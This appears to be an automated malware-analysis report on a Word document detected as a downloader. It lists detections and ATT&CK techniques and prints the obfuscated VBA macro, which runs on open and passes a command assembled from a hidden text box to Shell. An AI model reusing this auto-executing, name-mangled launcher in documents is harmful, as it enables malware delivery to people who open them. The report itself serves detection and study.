MALICIOUS
292
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059.001 PowerShell
T1059.003 Windows Command Shell
The sample contains a VBA macro with an autoopen subroutine that utilizes the Shell() function. This function is used to execute external commands, indicated by heuristics firing for cmd.exe and PowerShell. The macro's obfuscated nature and the presence of these execution indicators suggest it's designed to download and run a secondary payload. The ClamAV detection 'Doc.Downloader.Sload-6786419-0' further supports this downloader functionality.
Heuristics 10
-
ClamAV: Doc.Downloader.Sload-6786419-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Sload-6786419-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Set wOSzjaiavMiwOVXtlwnBDz = YicIlFlTZtupmwwW IjwIh = Array(zfolPNr, HwFiHjwf, MoKXV, Interaction.Shell(EGZLukHCVif, UFNwGZw), qImEzuWud) Select Case nQzIKtaZpHzqHSOnpTw -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox" Sub autoopen() rdsHZ -
Suspicious cmd.exe invocation with execution flag high SC_STR_CMDSuspicious cmd.exe invocation with execution flag
-
Reference to PowerShell high SC_STR_POWERSHELLReference to PowerShell
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8876 bytes |
SHA-256: 908ba386dfd98d415943aaac7ecdfef8d7ebdbf23ff2df41aca9adff84ff3cd8 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
231 of 275 identifiers look randomly generated (e.g. 'AoNKQssDaUsEPZKiqjUCGhcz') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "pXirGKdhzK"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Sub autoopen()
rdsHZ
End Sub
Attribute VB_Name = "jwCWVLSqL"
Function rdsHZ()
On Error Resume Next
Select Case OPjwrUumFokdYaNJXofnKYv
Case 161731550
tRVPNFIltHvESaKiYZaU = PpfrqObqkpTKRz
YWsibrfSREFOVJ = Log(zVDcdbqYXqhuISctAcHFBh)
sKkWNmkzFhzqwGpUbiwVsuw = 151270208
pLEmOEkSdLRtFc = mrbNKbimLHfWDLzwONVYb
Case 211058640
rdNYUvYaWGMiBTjM = 165990150
ZtijhjGdMDjjDKGd = Log(kzDJqmhIPqcwiiAwNCmiI)
jSqjVunCCcXjzOVBiGzaSqdf = 224046435
fmqITuboQlSHRnVNoAb = Log(fmaLTflhdqoLBwOALuJcIKz)
End Select
Set ibpKFEBdEmttMionJtLaw = GUYUBuqwmUopcsq
Select Case MkbaRMulSIojIXadv
Case 129720147
wFVZFEXiFbuiBiQ = EEwwpIhCqHQbfdEfDSaMqLWV
ioJXamCrbVZwXQpYTiwowCc = Log(PiiEEEthcCLTXiPUNk)
HfifBknXcYjzbM = 256912341
vDznXcrTVFWBpTd = LwUrhzhTQhRIwFjGkWT
Case 109462163
zjfnOKwOmhJuFldsv = 173678535
WdWpLiXQWPRSzNKORoDSokFi = Log(IOqTFOowXtmaqUFruawUPJhu)
MEsHHmYsqCUhwQBcWb = 125985552
naTzbuKGJjwjvwtKwoP = Log(NiARkJzJzrthOVj)
End Select
Set kujNbRiGEolAWrjhMLLFa = NRzAJSqQRaNHZB
Select Case wWHBzDkwFPnJpNNcwfXXQf
Case 62592821
prkdBPWZfSzTuq = jEadhjdIRnYDFmKXTM
LHTHuqtNiWQthH = Log(oSpBcULjSpdLRmUv)
GrfLQzfnnVzlBtrvtwsi = 114927561
jzYARRicaKblnqczXUJOo = MzRvmPXnbMMVHfmQfOILvpJP
Case 40987762
TtbXYCwlnaiWfP = 30009655
iPZRizMHovGcDXoCplwdMD = Log(JZWsMhJitHIGuqoSWhTjdw)
hPmjjuSaaiaPsLEAai = 81856207
VuQuLBSawtUKNFpc = Log(AdoajicTavHRjtEQiwm)
End Select
Set sUfbrihKQBnWcbZBXnoMoalF = JQzPufGCchfzNiBB
Select Case VQBBXWorVhYBNfQSfJY
Case 234332107
MmCbcDiFjSQacDoUAYauZRDM = imnNpfzwaIdwZvSGmlOHalbb
ikzpXvjqcwRvrunTdBuKWbdI = Log(nfoEYsKLQKuzHCNuIzwBLu)
bozkjQbDHpAkPulDFHjbjsT = 149797475
hQOdjHdsoMQbIdvpHnKGSwAW = qubTIjUalzAMZahXrahUczd
Case 264527052
cEIQfjPrjpNBZjdwAWiuch = 82921885
iaXTBRtQnjjiLJFQkVpl = Log(WSuDYbbwtKusjiFLwp)
wwNsAwkrQOJGsbIMI = 191605100
dpSStWlmfbAEojXoY = Log(auFnkKkjDCQXWwi)
End Select
Set MciiTVOMFPQJVaUmjDiiK = FHhKSjVHFDWGTuKuoEfsiU
Select Case cAbWlCCBSQwDmNQFSHh
Case 32266878
jXEiBzaLVNmYadzR = NsiWJJuUqGiUdtKz
tdWsjFbpwDKfLjSoH = Log(panZOJJLrvqrTcaMkUuSdnD)
MFkpiWLfVzUXaTPNiYOf = 339838235
jhFzzwuoQBWHMIZ = hUjKWUHClQEjkFZXjH
Case 147756069
kiXNljjTASGHoO = 283762910
vpiPaCOitNEKczbFlWkDzWZ = Log(koBSKzsVOfbrZHchPoTXbY)
BrBVRdowZPsimAvYwUiwzXj = 210568394
uCnIDBOLzAaIcbsaiCbh = Log(phTQXCsctiIVqXbAoWO)
End Select
Set TpAVPTtqWOUIwCEVTrfz = jDVSnlDQZujNDIAhwB
Select Case YhCbQoLazirXPotXcp
Case 87490027
BhUmkshdzjNDzr = qIWKjAFNSsZMdXXuHnlSqMQq
HicSUnYXqCOGijBwTC = Log(LjDFalGQNZHdsfnZSduwFBo)
UIodGjWWKWfrDcBhOWKwiZ = 147370413
rHjSYDoKrQlRzdKdCkT = AvWpbNkiqpEvmNlwAD
Case 329729248
hUAmqkkkMhvwFAa = 315995424
tqLTGTBLqijrLdzmMofvj = Log(qdzWJuGpmnpNGNmnbBwaAGAt)
DwLsMuABuziTjK = 49031308
AsvCwWmzZMiwIwk = Log(GVFzuzatoLLNETrqrVAN)
End Select
Set rChKLTzPEswPFN = EKKDSCNmKYvFVoFnz
Const UFNwGZw = 0
Select Case cNQAdYDkAXhjNKzCTpDaWmJS
Case 128806551
KoEkDWzFVjdfir = TqRJBazzwiNDjaqDzhaN
fPUKlIoQYoKMzDvr = Log(ScLpHFqTNffffzDd)
nazwPSKjYqCqmWuLo = 100423994
CYXKdqXdIksqGjiQUuKCJAFj = odbIlUriFbpPQUIrp
Case 12668587
fzvHDGZRdNoCTnvpNwUXPBIB = 52511381
AEZCKUwGEPsVYCLCNVRZWbU = Log(uvVijiruzKFUrbCTDMjj)
rYRLMnmjiWYkuHOzUXaXzWNw = 282068904
mSzVKsohDXDSWqEL = Log(ojkzTnUjoIIzVKVUB)
End Select
Set TlNLfvMErwBBjT = FZPFOTfdmVkfhhMhzUqlZD
Select Case TcILWFbuPRLFOZnFNS
Case 245425697
jFPEVwwwUplaRFWr = MpMpDUtjsaZITAkJOm
NDpYJcZajloJCvjB = Log(YVfkVXdXXqBoAQCTJiS)
RDMiuNvERXMjzIktGc = 286092256
MAmmXlfUlqsRRdKVIBqI = YFzdSprfIMjnmLQRZGI
Case 218897647
SbivRWwPlFmiDnvmJFw = 262943419
ddMdfRtEiuibAGiVhATtQX = Log(uEiXVfQBLtmpzSR)
EEKCLEHChRQcFduYFWRZzu = 158265194
SsWhOQjDPOPpGUvqwfq = Log(OnvizOjaAsoJjl)
End Select
Set ShZoQkNMqOESkabcRDTKi = oiAhGCWZFJUldIWraUBaFTuw
Select Case ijJzRblFYErPJdGfHBNo
Case 280755963
JcECXJkZLFFlVAkkvaLIrYMT = aajjSElmkWhsPEcVztmKXIGu
FndhGlPlFwiDqsAUzk = Log(DsjVinsfaJZRUlMMQHEi)
SHKHtRJAlqXXdriZRuuNF = 270017693
ffORifkMvGrllVOoVji = SCtruinzMKQfdffcfAfUBd
Case 181549676
lFtDDFYibAJclXXvs = 240391720
lpLIFqlJVEJmobcFopjwGlmE = Log(VCrIcjbRipcZznMRwDZ)
OUBIRiGJnsACHjknu = 4788461
VhVKlAjqCWfKhNmNABirtcS = Log(lpZSRCYWvKEktKPIlsEm)
End Select
Set iSpUSjlMJzsPrZv = NZzzIOWICUqmZGBXfUC
Select Case EWYlRLQUORlKHGqDoCij
Case 25140274
KwvjjiqNUAAlIkFX = szwucNowwhjwkMMaqMZplb
dAwkKVzGwQMplFThlGjmwK = Log(knnLRYfhEQLVtfcib)
bhiYXaVXiojBppTmMzWJfiTj = 47934859
akZBJcInVcjLQNqutrw = bWBGTfHRTsNzRw
Case 1950339
zdiGtBUqGBjJTlpckEwEi = 124054873
iUrTcOjuSNEwPMrJaBLAS = Log(zziDlONBwDivAlChsbZGOwPo)
PsuWCWSQfWtlYdShQQB = 116988262
MGHsJkaLkBiuiWWTit = Log(MiUOIwTwHZzfNWEDmmis)
End Select
Set rEvVLruHvOmXVFpsrzwqmS = nWUXZSjjABtUaYtwFZqLKK
Select Case skjlfnhvUODtCn
Case 332147161
kZFXbszGvnpXzbqsLTqqUu = mFbPznrcbwFWSUHZzm
pswKwsYLiizISqESRzdw = Log(DKOatFYXEurDrFcovf)
bcJuionjNCpZVnJlhj = 234172327
nzndoFEalciWUH = rtQjmFYKUOUVPiTuELb
Case 234276715
ofGYjMvlYSFOQRrRzzz = 93728906
SPTjosRhZLtXwDOJLCtdZw = Log(PHzQbdEOdVlVQmpvTdDwGLrT)
dIouEkQWSEcobqEU = 322136895
CKhzWVHZAVzpDQfCz = Log(PUZkVzwhNGsnwiJwoJ)
End Select
Set jlSnfjuYcBLJZsjEcpRp = woIAhNXTfGbWWRjzhtAbb
EGZLukHCVif = pXirGKdhzK.TextBox1.Text + PKumhC + SIwqTV + OcGKIou + zDrRvH + hlWbk + tvHQuFlD + lERqfkON + dYmQjzrw + XmTXhpH
Select Case KtLqRsFiUWiHwNdiSczZqoc
Case 125736444
JCpjsGzPNDpfBWBfCEp = lduYGhnhBAWQsRIqQzbP
skJoCRFwtokmnnfHRcLTP = Log(NhYnjOLPCcZwstkj)
PhkHMldFiciwWQ = 316019588
fXbPOirlimHMovmWi = vlfFAwuiFlcRfMdjNWJ
Case 132339003
hqzdaiQQjqLQzUKmZWfUjc = 36538913
NGuiHhPNNjNvjba = Log(iRWuQAirTuoAdzIEl)
QTjhIBawCOHPGzvNqOGKsM = 158729852
PNtPjOaIKqLGiw = Log(UUSwTkEoqEQIuzaz)
End Select
Set vjSuILOnnwEQmo = uEmqZNESKZCKTFjKjsHK
Select Case FdRNuDEnVhJFBpdPDaEQZ
Case 306788462
FvtBpPozHpBpJIsSafrd = pRzirNMfHaJKAMSB
OXhiCPAATHKHil = Log(RTQdvWwBbTAPrfJwaQXQT)
bnCziXGCXcpcthwpFjPWFOBz = 62603271
KKjqGUOVrdawsbvYvX = PlbAlLrBzpNlDnJNvTh
Case 144672210
NXqTOHoobhSiYujiKw = 206488692
SRfdrXKjOzFOBFBOl = Log(WEDMWIvHitZilUBGBwrN)
qwEacbDcTsUzdbaLGvW = 224521107
tRJjNlMuDFWYFjIwmthri = Log(AEhHtavvBUirzivq)
End Select
Set qrhPnwYYvSNTBpqF = RECGslzHEBtOidCwfrAwv
Select Case tGJIcYwizYnKzzkDCn
Case 128641181
zTGGOqQnWEOJnvwUYNazh = BZHWtqPwRczGXZzCtmIK
vKdWCDPfpNUARSj = Log(swaYanmKhYWUVTorXXFPdzrn)
QbPfFFHSDBphliIXTpdjuKWZ = 194114494
uMRVsEnZJLXibSPCRSwJ = pwsKKOGEGFpBcLuBiIkuM
Case 162032438
AoNKQssDaUsEPZKiqjUCGhcz = 49453573
BiJNOYRzrWwDpLNBPh = Log(HfcYZuNrVrTLNDwrKuMFT)
PholnqJpERuPApYKjTBhvI = 161648635
jztUDHDcQTPujoHX = Log(jmBQzCGSAKsDlrHJiCnzo)
End Select
Set wOSzjaiavMiwOVXtlwnBDz = YicIlFlTZtupmwwW
IjwIh = Array(zfolPNr, HwFiHjwf, MoKXV, Interaction.Shell(EGZLukHCVif, UFNwGZw), qImEzuWud)
Select Case nQzIKtaZpHzqHSOnpTw
Case 80051887
jCssuZqhcCjijFcnvRWBGlTi = QfAJPbumiEOEPP
jrNEPLbNlztCcKqwjK = Log(itpYMbosBBOjjBBSOYOTqpS)
JWYSbnFiuYlbtTAca = 126129683
MWQNBascaVrApaaOpCW = NvkoHQaYuXlsXPGst
Case 62395253
sjLiJDYwASFKaECMQmb = 36961268
AThDjwdZUiVjiihCQbkiT = Log(FpMLnUDpGRDnrQdbaEv)
jkjivaVKzKrWQaNrrX = 70349907
WibDcrmQYpAfnzt = Log(FhQNztqvahWRCmkCun)
End Select
Set BJjCDoElJJLjTjslJHzIdofd = VUOlFwlzzsLZfMZvHjlPzClJ
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.